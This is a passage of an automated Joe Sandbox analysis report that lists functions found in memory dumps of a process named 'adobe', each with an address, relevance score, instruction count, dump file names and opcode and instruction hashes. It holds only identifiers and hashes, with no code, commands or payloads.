Opcode Fuzzy Hash: b3d16992072d08e831f2b9dc4ed9e57370ecd61d2d81ada7db2ab66f75e2fc26
Instruction Fuzzy Hash: 4351DBB6D1A209DFCB01CFA9D4848FEBBB9BB4D280F105455E856B7305DB789811CB62

Function 05FA8757 Relevance: .1, Instructions: 146COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3290345fe153ff46280a8fc20acde2cbc62b025846251313998ebf8a801fc570
Instruction ID: 02bbd48f743996a26a5908af89220b482c1769c0123c7c48808b2c403dc62e7e
Opcode Fuzzy Hash: 3290345fe153ff46280a8fc20acde2cbc62b025846251313998ebf8a801fc570
Instruction Fuzzy Hash: 6B51FDB6D1A109DFCB01CFA9D4848FEBBB9BB0D280F105455E856F7305DB789811CB61

Function 05FA92D1 Relevance: .1, Instructions: 131COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9d55048ccb930600bd96b19c4ea0362e26d62e4e8572a5cd647493d5e44811c
Instruction ID: 08fac3a03c1cdf20ce4b27abfc8e3d48c8f2a3a819ea3d951e59e8d837e44707
Opcode Fuzzy Hash: e9d55048ccb930600bd96b19c4ea0362e26d62e4e8572a5cd647493d5e44811c
Instruction Fuzzy Hash: 8141C3B6D49318CFCF10CFA9D684AEDBBFABB4A301F146125E40AB7251DB789941CB01

Function 05FA8609 Relevance: .1, Instructions: 120COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ea96f2dfb25088653d19f2cd8a29cb3234e4eaebd6812e2a245e3d8d8fdeee3
Instruction ID: 37f37eb5c049df8da0dd7c3ee66ea9e6a11cc010a1485d350cf6f7e88e0102da
Opcode Fuzzy Hash: 7ea96f2dfb25088653d19f2cd8a29cb3234e4eaebd6812e2a245e3d8d8fdeee3
Instruction Fuzzy Hash: B5415DB6A18218CFD704CF5AD5849BABBFAFF8E340B419495D019AB326DB789D14CB01

Function 05FA8618 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: feecaa4b57d3064614c83a857bb1b7e1de6d301dc391031247a3240e2495166a
Instruction ID: abcaaa57d48cc19185d654c9bbf84a05dafb221987c4946d935e41e62a0c4129
Opcode Fuzzy Hash: feecaa4b57d3064614c83a857bb1b7e1de6d301dc391031247a3240e2495166a
Instruction Fuzzy Hash: 3B412BB2E18519CFD704CF5AD5889BABBFEBF8D340B419495D019AB326DB789C14CB01

Function 05FA0D48 Relevance: .1, Instructions: 107COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a21264da0dc77f17cccc18df2676b2b674bb61596bb5dde7f3b53983591e2939
Instruction ID: 4b4e6e8a11a633551ac38d9bab3df07c48c4fe2aba143e1fe33ce874bfa653b4
Opcode Fuzzy Hash: a21264da0dc77f17cccc18df2676b2b674bb61596bb5dde7f3b53983591e2939
Instruction Fuzzy Hash: 3041D835E002099FDB14DFA4D59C7EDBBB6FF88300F144429E402AB294EF749946CB85

Function 05FAC860 Relevance: .1, Instructions: 106COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e641e53eff1ec81da2b5f7336cd5c8e352e5f59b3c1f7235c684117093905fff
Instruction ID: 7e0c7dfabbe29e2a0b83f66901af75b57addadc494841c67ea7162200a7c2ccf
Opcode Fuzzy Hash: e641e53eff1ec81da2b5f7336cd5c8e352e5f59b3c1f7235c684117093905fff
Instruction Fuzzy Hash: B34160B6E1010D8FDB44EBA4C9816EFBBB6FB88304F108069E615F7244DB385D01CBA1

Function 05FAA8C4 Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c8547c73c5a2854dfb76251fe35fd35c6c66322b68c914001edf8416172c7039
Instruction ID: f114814dd7f2b792f533acd7a7b098a8fad7912346f724560b862345766b510e
Opcode Fuzzy Hash: c8547c73c5a2854dfb76251fe35fd35c6c66322b68c914001edf8416172c7039
Instruction Fuzzy Hash: 39313BB6900208DFCB10DFA9D984A9EBFF5EF48310F14842AE509E7211D7359955CFA5

Function 05FAC870 Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b422b7e39add6ff4505df35661aead0b2d3aab7ce04f849c697a1b39c63831cd
Instruction ID: 628ca3682a2d5568eff68d1562456196876e68dbe1e547af742e37d5690b2898
Opcode Fuzzy Hash: b422b7e39add6ff4505df35661aead0b2d3aab7ce04f849c697a1b39c63831cd
Instruction Fuzzy Hash: 483150B5A1010D8FDB44EFA4C985AAFBBB6FB8C318F108029E615B7344CB345D01CBA1

Function 05FA11A8 Relevance: .1, Instructions: 94COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b49ab2d26cf0b2e6fb8af462f00cdb92df30f48637158932a69f2fb4dd24945
Instruction ID: e6dcb6853e6c3e311acef7904dbef0a9b3c011c9df41f23babe01a1c57a45b01
Opcode Fuzzy Hash: 5b49ab2d26cf0b2e6fb8af462f00cdb92df30f48637158932a69f2fb4dd24945
Instruction Fuzzy Hash: 764112B2E012489FDB14DFE9D984BDEBBF5AF48310F24802AE415A7250DB78A845CB91

Function 05FA119C Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f8887f6700a250f7d8398a261ed12812b57bc675cace080d08884bfff55c44e8
Instruction ID: 37cadf36c444beae39e12e6d4dabd0eae01875fb3523da184771a5c1d4e9b226
Opcode Fuzzy Hash: f8887f6700a250f7d8398a261ed12812b57bc675cace080d08884bfff55c44e8
Instruction Fuzzy Hash: EB3104B2D002489FDB14CFD9D994BDEBBF5AF48304F24802AE415E7290DB789985CF55

Function 05FAA960 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e0dd5ec96d36298cecccf06c4a45a55376183da9ed849cb5850a3d2b0c39a826
Instruction ID: 016fbb8e59703215f2ec8487c29023adb673acd97681bd738a5851e1eb5061a1
Opcode Fuzzy Hash: e0dd5ec96d36298cecccf06c4a45a55376183da9ed849cb5850a3d2b0c39a826
Instruction Fuzzy Hash: B111F0B6E003554FCB11DE7898546FF7BF6EFC9220B14852AD494D7241EB388C0983A1

Function 0120D1B4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 85ed4012dcebdf973821b085aa7eafcc077afdd4dd12f036ebc6eeb4844b2366
Instruction ID: 04ed3d2e0d9610d89630e989ae2092bc3d42270bf54a516febc8430726a47a84
Opcode Fuzzy Hash: 85ed4012dcebdf973821b085aa7eafcc077afdd4dd12f036ebc6eeb4844b2366
Instruction Fuzzy Hash: E5212271515308DFCB02DF98C5C0B26BBA5FB84324F20C66DE9094B297C376D846CA61

Function 0120D36C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab09bd84a3070412cc93207f7ce2926baad3edb39fc0276c5ff8cf89c3dfdcb5
Instruction ID: fdafdcd93b89ed442bc49c743cc469379ee0eb5a28138a2eb2fa94ebab0765e8
Opcode Fuzzy Hash: ab09bd84a3070412cc93207f7ce2926baad3edb39fc0276c5ff8cf89c3dfdcb5
Instruction Fuzzy Hash: 78212271510208DFCB02DF98D5C4B26BBA5EB84314F20C66DE9094B297C37AE846CA61

Function 05FAD030 Relevance: .1, Instructions: 68COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ff0b8af7ce3721d8984465f2b69e076f548695c490a200eec5fe4dbc0f43257
Instruction ID: 4acd7fcfdb1ca04e179c509290cca7de9d11baea83d9f9df2b400709e50f98fb
Opcode Fuzzy Hash: 7ff0b8af7ce3721d8984465f2b69e076f548695c490a200eec5fe4dbc0f43257
Instruction Fuzzy Hash: 1F213A71B4D3488FC7159B24D9117AA3B76FF86200F64C09BD102CB6A6DE3A9C06CB83

Function 05FA480C Relevance: .1, Instructions: 67COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b91ec5464caf303f13d7ad63a2b446baa02119765c45435a9043a09e92bc5c5
Instruction ID: 65dfb3e95534cc8354fd2523f0641e4df7336acea706bc83c420ad90546a621a
Opcode Fuzzy Hash: 1b91ec5464caf303f13d7ad63a2b446baa02119765c45435a9043a09e92bc5c5
Instruction Fuzzy Hash: 7B31F2B1D01218DFEB20DF99C588B8EBFF5EB08314F24841AE444BB250C7B99889CF95

Function 05FAAB35 Relevance: .1, Instructions: 66COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2be2f3e871f9913280a7020dcf9703ca622cbcbec6399503008e5bab061c89cf
Instruction ID: 28678ee58ae6e4cfc7cf32ee2ab65a6ef2bddc4ad0a45ebddf5aa3e5cee88bfe
Opcode Fuzzy Hash: 2be2f3e871f9913280a7020dcf9703ca622cbcbec6399503008e5bab061c89cf
Instruction Fuzzy Hash: C821E0B5D04218DFEB20DF99D589BCDBBF1BB08314F24841AE444AB250C7B99889CF95

Function 05FABC80 Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31fbe7fb6da1716f614f5b6cb1f1a66d27f38767cf8ea2bc58c5a3f1763610c6
Instruction ID: 82ea9c06e0a0bfa0faa47adfc3b80511c5bb8bfe2deaac715f403d5ce5dc7b2b
Opcode Fuzzy Hash: 31fbe7fb6da1716f614f5b6cb1f1a66d27f38767cf8ea2bc58c5a3f1763610c6
Instruction Fuzzy Hash: 5F11C1B1B083849FDB06DB74891A9AD3FF4AE5210071404EAD845C7253E9399D06C712

Function 05FAA447 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3c7c4d7010d281f3e5286a1c72a13c8a124b33e120154eae2ce3ba69ade987a9
Instruction ID: f7a89ed5627dc36c00c8402223c5ac42040b830a45db3a5cb378c79617389c2d
Opcode Fuzzy Hash: 3c7c4d7010d281f3e5286a1c72a13c8a124b33e120154eae2ce3ba69ade987a9
Instruction Fuzzy Hash: 9F1161B69093458FDB06DF7498161E97FF0FE0621471841EBD485EB153F23A861BC752

Function 05FAA8D4 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0919ab3da56692b0bc2dabbb1c1371632df4e4b72327b158ec6a15c09c433327
Instruction ID: 95b54f446f2e2f9a3f923be8b17ffff29d390d1a598e2358b064cbfb4dfe3822
Opcode Fuzzy Hash: 0919ab3da56692b0bc2dabbb1c1371632df4e4b72327b158ec6a15c09c433327
Instruction Fuzzy Hash: 3A21D3B6D042499FCB10CF9AD884ADEBBF5FB48310F108429E959A7211C379A954CFA5

Function 0120D367 Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: aa08937ac7470b36fc049ccded0bda8392dc3ef160c717bb4083f49e67a3379b
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: D411BB75504284CFDB02CF98D5C4B55BFA1FB84318F24C6AAD9494B697C33AE44ACB62

Function 0120D1AF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892969468.000000000120D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0120D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_120d000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction ID: 24b69125a83be575bb1789135c0d2e81fb6f0681c3ed63c14ca91e53dd3c67a0
Opcode Fuzzy Hash: 48042a67946fd5b471a152cae87ddc5a96e5ad52caa5f07da488830fbc7c129d
Instruction Fuzzy Hash: 3811DD75505284CFDB02CF94C5C4B15BFA1FB84328F24C6AAD9494B697C33AD80ACBA1

Function 05FA4D50 Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a5e29ef56075718210e5a2cc1f2fe0cec4e4c367d16f39b602f28f057472fd42
Instruction ID: 0cdf45e0dd566c002e3668790d5f5cfe8b1f0bda546ec5d70200b91fb53c3d30
Opcode Fuzzy Hash: a5e29ef56075718210e5a2cc1f2fe0cec4e4c367d16f39b602f28f057472fd42
Instruction Fuzzy Hash: 370124243292884BC3467338D85575B3FA2EBCB254F88406AF945C73D9CE2C8C06C351

Function 05FAD022 Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e3c144e1ce0e359415b1f404a9b8bbb5ca311f5d101e1eb6977b0903ac9d00bd
Instruction ID: 79d2f422d0f05f6d00f4a540591ee7ac7ea2a52d718b56b7ef2e22a2b0887b46
Opcode Fuzzy Hash: e3c144e1ce0e359415b1f404a9b8bbb5ca311f5d101e1eb6977b0903ac9d00bd
Instruction Fuzzy Hash: 3E014C76F486048FD3589B04C901BA93762FB85211FA4C059D116CF7A9CA3D9C02CB83

Function 011FD781 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892659926.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81577ed72f585b3ef4aa3cb40c3d4cac55e285121ddc7dc8d0ba2509dc5fc429
Instruction ID: 2d50471e36b1ba836775e94f8130bac5ec9fc63d4e85229824f9fecadde88efa
Opcode Fuzzy Hash: 81577ed72f585b3ef4aa3cb40c3d4cac55e285121ddc7dc8d0ba2509dc5fc429
Instruction Fuzzy Hash: D101AC310087849AEB195A99DD84777BF98EF41328F18C66DEE094E156C779D840C672

Function 05FA8E28 Relevance: .0, Instructions: 43COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: de731b573834ace85f7b84a628a4c927049258246612b10337445885cc9b042f
Instruction ID: 3edb90086d416d384fc8b4aac88514f8b7b005092de5dd93143042c8dc01524b
Opcode Fuzzy Hash: de731b573834ace85f7b84a628a4c927049258246612b10337445885cc9b042f
Instruction Fuzzy Hash: 04014472D05209CBDB04CFA6C5057EEFBBFAB89300F00D465941967342DBB85945CF91

Function 05FA8E27 Relevance: .0, Instructions: 41COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 115b704bae3bf128a3f938d881ba408ea6c5bdb9a4629e4a8ef42c4f06a3d194
Instruction ID: 7f8acc527f77d9bfa2edde03cc93854d9e9ad591f4e2e51dcaefe9f97a505f53
Opcode Fuzzy Hash: 115b704bae3bf128a3f938d881ba408ea6c5bdb9a4629e4a8ef42c4f06a3d194
Instruction Fuzzy Hash: BF012CB6E05209CBDB08CFA5C5057AEFBBEAB89300F00D466941967342DBB84945CF81

Function 05FA9EBC Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c4a7cda942ffcd08fb13a47e794b0b19e5cc325d7f7b0ca581ab0633c328e1b4
Instruction ID: 54590bfde877864aba859d04c092dcaf3c834524a55c0fd0b66d18082483a0ac
Opcode Fuzzy Hash: c4a7cda942ffcd08fb13a47e794b0b19e5cc325d7f7b0ca581ab0633c328e1b4
Instruction Fuzzy Hash: B7F062B7E0915ECBCF10CF94E6805FDB3BABF09212F106431E005E2213D7789A018B22

Function 011FD780 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1892659926.00000000011FD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011FD000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_11fd000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 643c4d128ee0bc7839ede02ed949b67bc7639235b5a58506eeeed5c5a4f2e827
Instruction ID: ca5a628514317a48e2ca2d5facae5945985a6eda88b555115f76d6d14d174689
Opcode Fuzzy Hash: 643c4d128ee0bc7839ede02ed949b67bc7639235b5a58506eeeed5c5a4f2e827
Instruction Fuzzy Hash: C3F068714047849AEB158A19D984767FF98EF41738F18C55AED094F286C3759844CA71

Function 05FAAF00 Relevance: .0, Instructions: 34COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8f7ca3ad4b41b7f9fd2477f549b25004ee5dc6cc112288ce03e5afb3b5a4d714
Instruction ID: 6d27a16bf925fc419233fc59fc43042975e7ddc8f56c31223e55fd74f54bf750
Opcode Fuzzy Hash: 8f7ca3ad4b41b7f9fd2477f549b25004ee5dc6cc112288ce03e5afb3b5a4d714
Instruction Fuzzy Hash: 4401FBF1C00219DFDB18DF6AC4083EEBAF5BF48350F108225E465AA294D7784A48CF91

Function 05FA4D80 Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ed47f2058c58f5a9231c7ea760792a37c3199ac93cfc5a773c26114c8670f9a5
Instruction ID: 772094b62b47a815a3bc9f2dbe9b07ab526587bc1bc909a20f3839be72b1d98d
Opcode Fuzzy Hash: ed47f2058c58f5a9231c7ea760792a37c3199ac93cfc5a773c26114c8670f9a5
Instruction Fuzzy Hash: 3CF0E27872010C8BC3487B68E55862F77A7EBC9658B504039B906C779CCE788C01C390

Function 05FAAEFD Relevance: .0, Instructions: 33COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 359f6b4000e49ba73cfc05cdfe9ad7e26d89c09b2a092c4b7196797fa0c296f7
Instruction ID: be9cbb6364232f7fa4c276294f3056437f8699f4bdafc8c4405217be3f427ae6
Opcode Fuzzy Hash: 359f6b4000e49ba73cfc05cdfe9ad7e26d89c09b2a092c4b7196797fa0c296f7
Instruction Fuzzy Hash: 2301FBF2C00219DFDB18DF69C5043EE7AF1BF48311F148625E465EA2A4D3784A48CF91

Function 05FABD29 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0618bae65ab480fd08c1bb254cd8b00bad7a2ca78a31332a9356ad26129572d7
Instruction ID: 15c3e8a48b3207c06a543098f7737affd32815f1be60e4140f4905e64366bbf9
Opcode Fuzzy Hash: 0618bae65ab480fd08c1bb254cd8b00bad7a2ca78a31332a9356ad26129572d7
Instruction Fuzzy Hash: 5FF02732204144AFCF09CF58D991D9E7FB6EF09204B1880ABE489CB226D736E913C715

Function 05FAAFA0 Relevance: .0, Instructions: 32COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1b8d18fa4d16ce1f3e85f27349ff29f8128581e08d9aba7db8ee1ec62e67bc02
Instruction ID: 0998a67c5f1055cf62141f222d5a39c6510e647c205cea732240df5c0fea49dd
Opcode Fuzzy Hash: 1b8d18fa4d16ce1f3e85f27349ff29f8128581e08d9aba7db8ee1ec62e67bc02
Instruction Fuzzy Hash: DCE039B67041286F93049A6ED884C6BBBEEFBCC664311807AE508C7310DA319C00C6A0

Function 05FAAF9F Relevance: .0, Instructions: 30COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a83093932871c33ddd74237277d9f1208c0594bd289aae6d28caa3b16bd48767
Instruction ID: e3d7fa692c0d91b48ab5f350fb0cf5650b4a4dd150fce2a281a7ffd55679acd1
Opcode Fuzzy Hash: a83093932871c33ddd74237277d9f1208c0594bd289aae6d28caa3b16bd48767
Instruction Fuzzy Hash: 06E0EDB6B041245F9304DBAED884D7BB7EEFBCC665315817AE51CD7354DA319C01C6A0

Function 05FA0763 Relevance: .0, Instructions: 28COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d3f958c447ff136ab69e04181535362a67fa62172c328442969003fef3e24686
Instruction ID: 5770abb2a17d53674c614a0da138919831abfd450856baecd3d572fbb886652f
Opcode Fuzzy Hash: d3f958c447ff136ab69e04181535362a67fa62172c328442969003fef3e24686
Instruction Fuzzy Hash: 34F0553D7202099BD710E668EB4832B77EEE744788F004424A906DB788DF2DCC004BE2

Function 05FA0770 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6175d14bd29ca8487f3fa5fbb033da57fb52cc014fa0f5f734d07f64622efd7a
Instruction ID: 8da2005bdc522c6709ce8bd43b5e8451367a4a4e2c210913a63e22721093a5e3
Opcode Fuzzy Hash: 6175d14bd29ca8487f3fa5fbb033da57fb52cc014fa0f5f734d07f64622efd7a
Instruction Fuzzy Hash: 33E02B3D7201099BD710E568E75876B73EEE744788F404820A506DB788DF29CC004BE2

Function 05FAA710 Relevance: .0, Instructions: 24COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.1911842308.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_5fa0000_adobe.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 083b362934084f2a79e96a38bc70085c781a6915fe0bad369d1868bed0b17944
Instruction ID: 29f6b85ca18afad722ec01241cd993ab347169c0247b6ce73be2a2705d6b0bda
Opcode Fuzzy Hash: 083b362934084f2a79e96a38bc70085c781a6915fe0bad369d1868bed0b17944
